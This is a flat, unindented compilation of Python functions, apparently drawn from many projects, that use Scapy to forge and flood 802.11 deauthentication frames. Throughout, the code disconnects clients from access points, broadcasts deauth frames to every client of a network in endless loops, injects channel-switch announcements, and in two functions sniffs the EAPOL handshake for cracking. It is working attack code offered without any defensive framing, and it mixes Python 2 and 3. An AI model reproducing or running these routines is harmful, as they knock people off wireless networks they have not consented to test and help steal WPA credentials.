def run(self):
while True:
if self.flag:
raise Exception('Stop sending deauth packet')
for ap in self.AP_list:
address = ap[0]
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff',
addr2=address,
addr3=address) / Dot11Deauth()
send(deauth_ap, inter=0, count=5)
print ls(deauth_ap)
if len(self.clients_APs) > 0:
with self.lock:
for x in self.clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
deauth_pkt1 = Dot11(addr1=client, addr2=ap,
addr3=ap) / Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap,
addr2=client,
addr3=client) / Dot11Deauth()
send(deauth_pkt1, inter=0, count=1)
send(deauth_pkt2, inter=0, count=1)
def hack(self):
if self.mode is "ALL":
for ap in self.ap_list:
if int(ap[1]) == self.channel:
address = ap[0]
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff',
addr2=address,
addr3=address) / Dot11Deauth()
send(deauth_ap, inter=0.00001, count=5)
elif self.mode is "AP":
for ap in self.ap_list:
if int(ap[1]) == self.channel:
address = ap[0]
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff',
addr2=address,
addr3=address) / Dot11Deauth()
send(deauth_ap, inter=0.00001, count=5)
elif self.mode is "CLIENT":
if int(self.ap[1]) == self.channel:
deauth_ap = Dot11(addr1=self.client,
addr2=self.ap[0],
addr3=self.ap[0]) / Dot11Deauth()
send(deauth_ap, inter=0.00001, count=5)
def shoot(self, tgt):
self.__c_TGT = tgt
sniffer_thread = threading.Thread(target=self.start_eapol_sniffer)
sniffer_thread.daemon = True
sniffer_thread.start()
while not self.__SNIFFER_STATUS:
time.sleep(1)
__pkt_to_cl = RadioTap() / Dot11(
addr1=tgt, addr2=self.bssid,
addr3=self.bssid) / Dot11Deauth(reason=7)
__pkt_to_ap = RadioTap() / Dot11(
addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7)
for n in range(32 * 1):
sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False)
sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False)
while self.__SNIFFER_STATUS:
time.sleep(1)
self.__SNIFFER_STATUS = not bool(self.__SNIFFER_STATUS)
if self.verify_handshake(tgt):
return (True, self.__c_HANDSHAKE)
else:
return (False, [])
def deauth_client(self, client):
dic = {}
global cicl
if self.count == 0:
cicl = 50
else:
cicl = self.count
radio = b'\x00\x00\x0c\x00\x04\x80\x00\x00\x02\x00\x18\x00'
deauth = bytes(Dot11Deauth(reason=7))
#ID=14849
#SC=iter,
for iter in range(1, cicl):
ap = radio + bytes(Dot11(type=0, subtype=12,ID=14849, addr1=self.client, addr2=self.bssid, addr3=self.bssid,SC=iter)) + \
bytes(Dot11Deauth(reason=7))
dic['src_mac'] = self.bssid
dic['dst_mac'] = self.client
dic['type'] = 'Deauth'
dic['reason'] = 'Не подключенный клиент пытаетс отправить данные'
self.write_to_file(self.out, json.dumps(dic))
cl = radio + bytes(Dot11(type=0, subtype=12,ID=14849, addr1=self.bssid, addr2=self.client, addr3=self.bssid,SC=iter+1)) + \
bytes(Dot11Deauth(reason=7))
#tmp_cl = Dot11(type=0, subtype=12,ID=14849, addr1=self.bssid, addr2=self.client, addr3=self.bssid)
#dot11_cl = tmp_cl[0:-2]
#sn_cl = (hex(iter + 1) + '\x00').encode()
#packet_cl = radio + dot11_cl + sn_cl + deauth
sendp(ap, iface=self.iface, count=5, verbose=0)
sendp(cl, iface=self.iface, count=5, verbose=0)
if not self.event.is_set():
break
def deauth(self, e):
global SEQ_NUM
pkts = []
deauth_pkt1 = RadioTap() / Dot11(addr1=self.client_mac,
addr2=self.ap_mac,
addr3=self.ap_mac) / Dot11Deauth()
deauth_pkt2 = RadioTap() / Dot11(
addr1=self.ap_mac, addr2=self.client_mac,
addr3=self.client_mac) / Dot11Deauth()
'''
Channel Switch Announcement
+ Dot11
\x0d Action
+ Raw
\x00 Management
\x04 CSA
\x25 Element ID [37]
\x03 Length
\x00 Channel Switch Mode
\x04 New Channel Num
\x00 Channel Switch Count
'''
csa_pkt = RadioTap() / Dot11(
addr1=self.client_mac,
addr2=self.ap_mac,
addr3=self.ap_mac,
type=0,
subtype=0x0d) / Raw("\x00\x04\x25\x03\x00" +
chr(self.client_channel) + "\x00")
#csa_pkt = Jammer.append_csa(self.my_beacon, 56)
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
pkts.append(csa_pkt)
deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[
RadioTap].notdecoded[:10] + channels[
self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:]
deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[
RadioTap].notdecoded[:10] + channels[
self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:]
logger.log("Starting deauth on AP [G]" + self.ap_mac + "[/G] (" +
self.ap_ssid + ") and client [G]" + self.client_mac +
"[/G]...")
while not e.isSet():
for p in pkts:
SEQ_NUM += 1
p[RadioTap].SC = SEQ_NUM
p[Dot11].FCfield |= 0x20
sendp(p, iface=self.iface_ap, inter=0.1 / len(pkts))
logger.log("Deauth [G]stopped[/G]")
def perform_deauth(router, client, iface):
pckt = RadioTap() / Dot11(addr1=client, addr2=router, addr3=router) / Dot11Deauth(reason=4)
cli_to_ap_pckt = RadioTap() / Dot11(addr1=router, addr2=client, addr3=client) / Dot11Deauth(reason=7)
print('Sending Deauth to ' + client + ' from ' + router)
try:
for i in range(100):
sendp(pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0)
sendp(cli_to_ap_pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0)
print("\U0001F608")
except Exception as e:
print(f"error: {e}")
def forge_ap_cl(self):
_pkt_ap = RadioTap() / Dot11(addr1=self.cl,
addr2=self.ap,
addr3=self.ap) / Dot11Deauth(reason=7)
_pkt_cl = RadioTap() / Dot11(addr1=self.ap,
addr2=self.cl,
addr3=self.cl) / Dot11Deauth(reason=7)
if self.unlimited:
while True:
self.flood_ap_cl(_pkt_ap, _pkt_cl)
else:
for _count in range(0, self.count):
self.flood_ap_cl(_pkt_ap, _pkt_cl)
def shoot(self, _sn, _rc):
_pkt_ap_to_cl = RadioTap() / Dot11(addr1=_rc, addr2=_sn,
addr3=_sn) / Dot11Deauth(reason=7)
_pkt_cl_to_ap = RadioTap() / Dot11(addr1=_sn, addr2=_rc,
addr3=_rc) / Dot11Deauth(reason=7)
sendp(_pkt_ap_to_cl,
iface=self.iface,
count=self.deauth,
verbose=False)
sendp(_pkt_cl_to_ap,
iface=self.iface,
count=self.deauth,
verbose=False)
time.sleep(0.80)
def start():
ap = args.bssid
client = args.client
pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
for n in range(int(args.number)):
sendp(pkt, iface=args.iface, verbose=0)
print("Send deauth packet: " + termcolor(ap, "green") + " (ap) > " + termcolor(client, "blue") + " (client) via " +
termcolor(args.iface, "red") + " #" + str(n + 1))
sleep(0.5)
sendp(pkt1, iface=args.iface, verbose=0)
print("Send deauth packet: " + termcolor(client, "blue") + " (client) > " + termcolor(ap, "green") + " (ap) via " +
termcolor(args.iface, "red") + " #" + str(n + 1))
def deauth_all(self):
dic = {}
global cicl
if self.count == 0:
cicl = 80
else:
cicl = self.count
radio = b'\x00\x00\x0c\x00\x04\x80\x00\x00\x02\x00\x18\x00'
#deauth = bytes(Dot11Deauth(reason=15))
for iter in range(1, cicl):
ap_mobile = radio + bytes(
Dot11(type=0,
subtype=12,
ID=14849,
addr1='ff:ff:ff:ff:ff:ff',
addr2=self.bssid,
addr3=self.bssid,
SC=iter) / Dot11Deauth(reason=15))
dic['src_mac'] = self.bssid
dic['dst_mac'] = 'ff:ff:ff:ff:ff:ff'
dic['type'] = 'Deauth'
dic['reason'] = 'Врем четырехстороннего рукопожати истекло'
self.write_to_file(self.out, json.dumps(dic))
#packet = radio + dot11 + sn + deauth
sendp(ap_mobile, iface=self.iface, count=4, verbose=0)
if not self.event.is_set():
break
def pp_deauth(blacklist):
"""
Starts deauthentication attack for PineAP Suite.
"""
os.system("reset")
print "\033[1m" + banner_dos
print colored(
"\n------------------- ̿' ̿'\̵͇̿̿\з=(◕_◕)=ε/̵͇̿̿/'̿'̿ ---------------------\n̿",
"red")
print "\033[1m[--] TARGET(s): ", blacklist
time.sleep(1)
print "\033[1m[*] Deauthing PineAP client devices"
time.sleep(2)
print "\033[1m[*] Channel number being set\n"
time.sleep(2)
for d in blacklist:
clist = sniff(iface=iface, count=30)
channel = find_channel(clist, d)
os.system("iwconfig wlan1mon channel " + str(channel))
print "\033[1m[*] Sending 120 deauthentication packets to ", d
deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=d.lower(),
addr3=d.lower()) / Dot11Deauth()
sendp(deauth, iface=iface, count=120, inter=.2, verbose=False)
time.sleep(1)
print "\033[1m[*] Attack completed"
time.sleep(2)
def deauth_attack(gateway_mac, interface, target_mac):
#target_mac = "ff:ff:ff:ff:ff:ff"
#target_mac = "08:c5:e1:87:79:c1"
packet = RadioTap() / Dot11(type=0,
subtype=12,
addr1=target_mac,
addr2=gateway_mac,
addr3=gateway_mac) / Dot11Deauth(reason=7)
sendp(packet, iface=interface, count=10000, inter=0.1)
def attack_wlan(Client_mac, A_point_mac, M_mode):
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = Dot11(addr1=Client_mac, addr2=A_point_mac, addr3=A_point_mac)
# stack them up
packet = RadioTap() / dot11 / Dot11Deauth(reason=7)
# send the packet
sendp(packet, inter=0.1, count=100, iface=M_mode, verbose=1)
def deauth(self):
deauthPacket = RadioTap() / Dot11(
type=0,
subtype=12,
addr1=self.macTarget,
addr2=self.macAP,
addr3=self.macAP) / Dot11Deauth(reason=7)
while True:
sendp(deauthPacket, iface=self.interface, count=1, verbose=True)
sleep(30)
def deauth(ap, client):
i = 0
time.sleep(3)
while (i < 2):
# Deauthentication Packet For Access Point
pkt = RadioTap() / Dot11(addr1=client, addr2=ap,
addr3=ap) / Dot11Deauth()
print("Deauth to: %s" % (client))
sendp(pkt, iface=interface)
i += 1
def deauth():
ssid_mac = raw_input(
'Please enter the SSID mac for Deauthentication Attack: \n')
while (not is_mac_valid(ssid_mac)):
ssid_mac = raw_input('Wrong MAC address please try again: \n')
is_mac_valid(ssid_mac)
print('making attack for mac -> %s \n' % ssid_mac)
dot11 = Dot11(addr1=ssid_mac, addr2=target, addr3=target)
packet = RadioTap() / dot11 / Dot11Deauth()
sendp(packet, inter=0.001, count=1000, iface=interface)
def run_deauth(self):
# get client MAC from selected row
row = self.sel_client_table.currentIndex().row()
deauth_client = self.sel_client_table.item(row, 0).text()
# RadioTap() is first layer wireless packer, Dot11() Management layer Dot11Deauth() creates deauth frame.
pkt = RadioTap() / Dot11(addr1=deauth_client,
addr2=self.deauth_ap) / Dot11Deauth()
for i in range(50):
sendp(pkt, iface="wlp3s0mon")
def run(self):
while True:
if self.flag:
raise Exception('Stop sending deauth packet')
for ap in self.AP_list:
address = ap[0]
deauth_ap = Dot11(addr1=self.client,
addr2=address,
addr3=address) / Dot11Deauth()
print ls(deauth_ap)
send(deauth_ap, inter=0, count=1)
def disconnect_all(gateway_mac, interface):
target_mac = "ff:ff:ff:ff:ff:ff"
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = RadioTap() / dot11 / Dot11Deauth(reason=7) #radioTap- header in IEEE 802.11,
# send the packet
sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
def forge_ap(self):
_broadct = "ff:ff:ff:ff:ff:ff"
_pkt_ap = RadioTap() / Dot11(addr1=_broadct,
addr2=self.ap,
addr3=self.ap) / Dot11Deauth(reason=7)
if self.unlimited:
while True:
self.flood_ap(_pkt_ap, _broadct)
else:
for _count in range(0, self.count):
self.flood_ap(_pkt_ap, _broadct)
def attack(self):
client = "FF:FF:FF:FF:FF:FF"
for i in range(0, len(self.found_APs)-1):
print("Now deauthing all users from " + self.found_APs[1])
ap = self.found_APs[i]
# deauth packet for AP
packet = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
#interface must be the monitor one
sendp(packet, iface=self.valueObj.interfaceName, count=self.valueObj.count, inter=0.1 ,verbose=1)
def remote_deauth():
interface = input("Please enter wireless interface name >")
ap = input("Access Point mac address >")
target = input("Target mac address >")
pkt = RadioTap() / Dot11(addr1=target, addr2=ap, addr3=ap) / Dot11Deauth(reason=2)
print("Press CTRL-C to stop")
while True:
try:
sendp(pkt, iface=interface, verbose=False)
except KeyboardInterrupt:
sys.exit("Quiting")
except OSError:
sys.exit("Please enter an valid wireless interface")
def shoot(self, tgt, deauth, _phaz_instance):
self.__c_TGT = tgt
if not self.__SNIFFER_STATUS:
sniffer_thread = threading.Thread(target=self.start_eapol_sniffer)
sniffer_thread.daemon = True
sniffer_thread.start()
while not self.__SNIFFER_STATUS:
time.sleep(1)
__pkt_to_cl = RadioTap() / Dot11(
addr1=tgt, addr2=self.bssid,
addr3=self.bssid) / Dot11Deauth(reason=7)
__pkt_to_ap = RadioTap() / Dot11(
addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7)
for n in range(deauth * 1):
sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False)
sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False)
if self.verify_handshake(tgt):
_phaz_instance.THEPOL = tuple(self.__c_HANDSHAKE)
def perform_deauth(bssid, client, count):
pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
cli_to_ap_pckt = None
if client != 'FF:FF:FF:FF:FF:FF':
cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client,
addr3=bssid) / Dot11Deauth()
print 'Sending Deauth to ' + client + ' from ' + bssid
if not count:
print 'Press CTRL+C to quit'
# Send the packets in bursts of 64, then sleep for half a sec or so
while count != 0:
try:
for i in range(64):
# Send out deauth from the AP
send(pckt)
# If we're targeting a client, we will also spoof deauth from the client to the AP
if client != 'FF:FF:FF:FF:FF:FF':
scapy.all.send(cli_to_ap_pckt)
# If count was -1, this will be an infinite loop
count -= 1
except KeyboardInterrupt:
break
def deauth(interface, gateway_mac, target_mac):
#MAC destination, MAC source, MAC Access Point
dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack all layers
packet = RadioTap() / dot11 / Dot11Deauth(reason=7)
print(
"start sending deauth packets with gateway_mac: %s to target_mac: %s" %
(gateway_mac, target_mac))
# send deauth packet
sendp(packet, inter=0.1, count=10000, iface=interface, verbose=1)
def deauth(self, mac, target_mac, iface):
mac = str(mac)
target_mac = str(target_mac)
pkt = RadioTap() / Dot11(addr1=target_mac, addr2=mac,
addr3=mac) / Dot11Deauth(reason=2)
os.system('sudo ifconfig %s down' % (iface))
os.system('sudo iwconfig %s mode monitor' % (iface))
os.system('sudo ifconfig %s up' % (iface))
while True:
try:
sendp(pkt, iface=iface, verbose=False)
except:
print("Client down")
break
def run(self):
dot11 = Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=self.target,
addr3=self.target)
packet = RadioTap() / dot11 / Dot11Deauth(reason=7)
try:
sendp(packet,
inter=0.1,
count=None,
loop=1,
iface=self.interface,
verbose=0)
except Exception as e:
logging.exception(e)
print("DOS STOPPED")
def pp_deauth(blacklist):
"""
Starts deauthentication attack for PineAP Suite.
"""
attack_start = "[*] Attack has started for " + str(blacklist)
print colored(attack_start, 'red', attrs=['reverse', 'blink'])
time.sleep(2)
channel = 1
for target in blacklist:
clist = sniff(iface=iface, count=50)
channel = find_channel(clist, target)
deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=target.lower(),
addr3=target.lower()) / Dot11Deauth()
sendp(deauth, iface=iface, count=120, inter=.2, verbose=False)
time.sleep(1)
print colored("[*] Attack has completed..",
'green',
attrs=['reverse', 'blink'])
time.sleep(2)
def disassociate(self):
# Forge the dot11 disassociation packet
dis_packet = RadioTap() / Dot11(
type=0,
subtype=12,
addr1=self.target_mac,
addr2=self.other_mac,
addr3=self.other_mac) / Dot11Deauth(reason=self.reason)
# Loop to send the disassociation packets to the victim device
while True:
# Repeat every delay value seconds
time.sleep(self.delay)
print("[" + str(datetime.now().time()) +
"][+] Disassociation frames (reason " + str(self.reason) +
") sent to target " + self.target_mac +
" as sender endpoint " + self.other_mac)
sendp(dis_packet,
iface=self.interface,
count=self.num,
verbose=False)
def deauth(self,
target_mac: str,
source_mac: str,
count=1,
burst_count=200,
channel=None,
reason=7):
self.channel_lock.acquire()
if channel:
self.set_channel(channel)
pkt = RadioTap() / Dot11(type=0,
subtype=12,
addr1=target_mac,
addr2=source_mac,
addr3=self.bssid) / Dot11Deauth(reason=reason)
for i in range(count):
cprint("DEAUTH!!!", 'red')
for j in range(burst_count):
self.inject(pkt)
if count > 1:
sleep(.1)
self.channel_lock.release()
